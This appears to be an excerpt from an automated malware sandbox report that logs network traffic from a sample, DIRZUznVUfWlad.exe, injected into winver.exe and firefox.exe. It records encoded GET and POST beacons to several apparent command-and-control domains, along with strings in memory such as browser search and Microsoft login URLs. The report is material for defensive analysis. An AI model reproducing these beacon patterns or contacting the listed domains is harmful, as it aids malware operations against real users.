                Source: global traffic HTTP traffic detected: GET /6urf/?3vNdCBvX=l+g0G83zvX30P9FiLKUhk1gZnSMwjxKGmxU2wY32UHo7SRAzM3NVc5Nn4wkj2AVHW/hBkkPychobZjIg4/uR6e8+1gk4cvE7j0i5NK3NPPZTmYTXI7istro=&etx=BXy4elO0X HTTP/1.1 Host: www.connecty.live Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global traffic HTTP traffic detected: GET /cpgr/?3vNdCBvX=yUPZw4O96lKRgUDhHw42lX6F/Rxn05lUVr3HqoHreXe2a6Vc78U2VxoX4VUOXe2AKNSXv9msRJ2q39Y75lzjFijspiVTtXDCDHBic1mdKVGnCgRAN7vlfYA=&etx=BXy4elO0X HTTP/1.1 Host: www.tals.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global traffic HTTP traffic detected: GET /u9hy/?3vNdCBvX=WqQro+xdjTeJIlGwaHeXAa2bD6tPyTI49rKxVxpmjgGfbhgcY6AAEIO8u8GwbvTJPVNB3UOdkxCDRvWF6atxIpJrNQCfkQktXm0b+9FyofxiDukpHyXFoA4=&etx=BXy4elO0X HTTP/1.1 Host: www.50food.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global traffic HTTP traffic detected: GET /f8c6/?3vNdCBvX=qZLxeIvUMpnHejM+2fTaZNrv2WO4y9kWVFIDlZeaKgP5Xe4TtN4Ku6PXk96ANpScY+aAYV4Nd0GQ4lG6LSWgsy7m2PREgKHVMtzZClnOVsBz8/E/4iFHS34=&etx=BXy4elO0X HTTP/1.1 Host: www.zriaraem-skiry.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global traffic HTTP traffic detected: GET /gb2h/?3vNdCBvX=EASy0dFQ3+mIcpYj5hhEpzGwaoMP7Xj9wz6GDDYkBoOZntt4ETpAdTcmLSDA/l8Pq56TjzGqLUU3SQIDrjgXHLAts09AmDfBZWK+en/xOBIa/+jQwvZyXLY=&etx=BXy4elO0X HTTP/1.1 Host: www.nmgzjwh.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global traffic HTTP traffic detected: GET /gdvz/?3vNdCBvX=42oDQZKHBS2RpvFPN57q1Tvu2doBJ10tXRowK0Gqt433jWsXILGJddh+nwwRXUDcpHF9qTVEG6VDXm2WV9OicxtKtIH3MbSxhASop5ADKNulvt1+Wm0v0/w=&etx=BXy4elO0X HTTP/1.1 Host: www.sklad-iq.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: unknown HTTP traffic detected: POST /z9pi/ HTTP/1.1 Host: www.jijievo.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Origin: http://www.jijievo.site Referer: http://www.jijievo.site/z9pi/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 205 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Sun, 24 Nov 2024 07:10:24 GMT Content-Type: text/html Content-Length: 409 Connection: close ETag: "66d016cf-199"
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Sun, 24 Nov 2024 07:10:27 GMT Content-Type: text/html Content-Length: 409 Connection: close ETag: "66d016cf-199"
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Sun, 24 Nov 2024 07:10:29 GMT Content-Type: text/html Content-Length: 409 Connection: close ETag: "66d016cf-199"
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Sun, 24 Nov 2024 07:10:32 GMT Content-Type: text/html Content-Length: 409 Connection: close ETag: "66d016cf-199"
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Sun, 24 Nov 2024 07:10:40 GMT server: LiteSpeed
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Sun, 24 Nov 2024 07:10:43 GMT server: LiteSpeed
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Sun, 24 Nov 2024 07:10:45 GMT server: LiteSpeed
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Sun, 24 Nov 2024 07:10:48 GMT server: LiteSpeed
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sun, 24 Nov 2024 07:11:10 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 
72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sun, 24 Nov 2024 07:11:13 GMTserver: LiteSpeed Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sun, 24 Nov 2024 07:11:18 GMTserver: LiteSpeed Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:11:42 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:11:45 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:11:48 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:11:50 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Sun, 24 Nov 2024 07:12:07 GMTContent-Type: text/htmlContent-Length: 166Connection: close Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Sun, 24 Nov 2024 07:12:10 GMTContent-Type: text/htmlContent-Length: 166Connection: close Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Sun, 24 Nov 2024 07:12:13 GMTContent-Type: text/htmlContent-Length: 166Connection: close Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:12:15 GMTContent-Type: text/htmlContent-Length: 0Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:12:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 29 Aug 2024 10:57:57 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kBf1BjCvoiC1SKu16txwjLORJtdwAflJvnPVMD7uoQXCMcbVbQdLLZ8MWbE3M%2Fb9BPRu2m73E4YBQ7AzBYZPeqC78ORTKK9m118VIuVBpUKBMY9UR4oPKsPCuK0HGZ6TYVJUQPi7uMbM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e77973a5fc741c1-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1980&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=740&delivery_rate=0&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:12:30 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 29 Aug 2024 10:57:57 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jc13MpNOkPSm%2FHCpuh0AsaK8KFSNwt4%2BJz0QSc8P%2BAIOrgVBoLP%2FPJVm8yiGz2GogPEWldPSg%2Fej5X%2FbbAHevb7q3n1x4XtVlYhE49e0gg%2Fwna%2BrMmFxi7nVxYLLJ3VD5FbkslM7UW4G"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e77974b3c5fc325-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1483&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=760&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:12:32 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 29 Aug 2024 10:57:57 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1AgBr3xSXfcRde%2FSAIDDN9sIKwa1vbLebtGg8HcQqLR2diOP22MxOzsy76fu0Es9np2gSxqNwKAzGEfj1txMU8KvHy1yHg6IktTiwGi3G01hlqHbG8085LuRQepcj%2FSZQseL1QhHl9Ko"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e77975c8fa21a34-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1783&sent=3&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10842&delivery_rate=0&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:12:35 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 29 Aug 2024 10:57:57 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XU%2B%2FeBuyhZbQaCVHCP8THNIc8pBHNmgYv2RthtfTySjzC3HuAWKYDvZPTfdes3m7Yyo%2FAeOtdcQ7JtJIhih4f4wDjWWOuRh7D4%2BJX5T6%2Ft20IOZJOzmPdYucrZfsFbZEjFmkLTLA%2BUjy"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e77976dee424261-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1571&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=466&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Ascii: 57d<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css"> body {font
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:12:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OSb3x4YC0arQMdCNS%2FiImRi2s5C%2Bo%2FFpK8h%2FlzNPerCzKbG1Q0gqwGQyaoyjBYvluIYtg%2Fd6k2FTINV%2Bz1hXANXAF8r0TkCXvI5ClYaRZh%2Bt2FkKjq%2FiBC5MIB3KMMPj%2BRE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e7797bcec31c43b-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1470&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10821&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:12:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WurFPj1JcJ1uFHk%2BFiD8RfeidKmi6k10MmkL4pZ033HGVq9QTaQWWSfHlkXEOUk4jA5zjvoHJgaar9hELacHOU8SxKPvQnyr2ItO0qmC0xxzbBoH1ATQugKDL5hNcNQeLQM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e7797cdaedc8c09-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1761&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=459&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Ascii: 8a<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:12:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Sun, 24 Nov 2024 07:13:01 GMT; Content-Type: text/html; Transfer-Encoding: chunked; Connection: close; Content-Encoding: gzip
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Sun, 24 Nov 2024 07:13:03 GMT; Content-Type: text/html; Transfer-Encoding: chunked; Connection: close; Content-Encoding: gzip
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Sun, 24 Nov 2024 07:13:06 GMT; Content-Type: text/html; Transfer-Encoding: chunked; Connection: close
                Source: DIRZUznVUfWlad.exe, 00000007.00000002.4145384093.0000000003E28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://narman.com/
                Source: DIRZUznVUfWlad.exe, 00000007.00000002.4147404593.0000000004F39000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.sklad-iq.online
                Source: DIRZUznVUfWlad.exe, 00000007.00000002.4147404593.0000000004F39000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.sklad-iq.online/gdvz/
                Source: winver.exe, 00000006.00000002.4148412401.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: winver.exe, 00000006.00000002.4148412401.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: winver.exe, 00000006.00000002.4146215002.00000000064C2000.00000004.10000000.00040000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000007.00000002.4145384093.0000000003972000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: winver.exe, 00000006.00000002.4148412401.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: winver.exe, 00000006.00000002.4148412401.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: winver.exe, 00000006.00000002.4148412401.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: winver.exe, 00000006.00000002.4148412401.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: winver.exe, 00000006.00000002.4148412401.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: winver.exe, 00000006.00000002.4146215002.0000000006C9C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
                Source: winver.exe, 00000006.00000002.4144237864.0000000003286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: winver.exe, 00000006.00000002.4144237864.0000000003286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: winver.exe, 00000006.00000002.4144237864.0000000003286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: winver.exe, 00000006.00000002.4144237864.0000000003286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: winver.exe, 00000006.00000002.4144237864.0000000003286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: winver.exe, 00000006.00000002.4144237864.0000000003286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: winver.exe, 00000006.00000003.2220349764.0000000008035000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: winver.exe, 00000006.00000002.4146215002.0000000006C9C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.sklad-iq.online&rand=
                Source: winver.exe, 00000006.00000002.4146215002.0000000006C9C000.00000004.10000000.00040000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000007.00000002.4145384093.000000000414C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
                Source: winver.exe, 00000006.00000002.4146215002.0000000005CE8000.00000004.10000000.00040000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000007.00000002.4145384093.0000000003198000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bt.cn/?from=404
                Source: winver.exe, 00000006.00000002.4148412401.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: winver.exe, 00000006.00000002.4146215002.00000000059C4000.00000004.10000000.00040000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000007.00000002.4145384093.0000000002E74000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2341761570.000000003EA84000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.grandesofertas.fun/wu6o/?3vNdCBvX=PAJ2EBywaoPRtAOAuLkHmGqEo3O5GOPxYR74cZ8tmddFXtcUCShy8K
                Source: winver.exe, 00000006.00000002.4146215002.0000000006C9C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.sklad-iq.online&utm_medium=parking&utm_campaign=s_land_
                Source: winver.exe, 00000006.00000002.4146215002.0000000006C9C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.sklad-iq.online&utm_medium=parking&utm_campaign=s_land
                Source: winver.exe, 00000006.00000002.4146215002.0000000006C9C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.sklad-iq.online&utm_medium=parking&utm_campaign=s_land_ho
                Source: winver.exe, 00000006.00000002.4146215002.0000000006C9C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/sozdanie-saita/
                Source: winver.exe, 00000006.00000002.4146215002.0000000006C9C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.sklad-iq.online&amp;reg_source=parking_auto
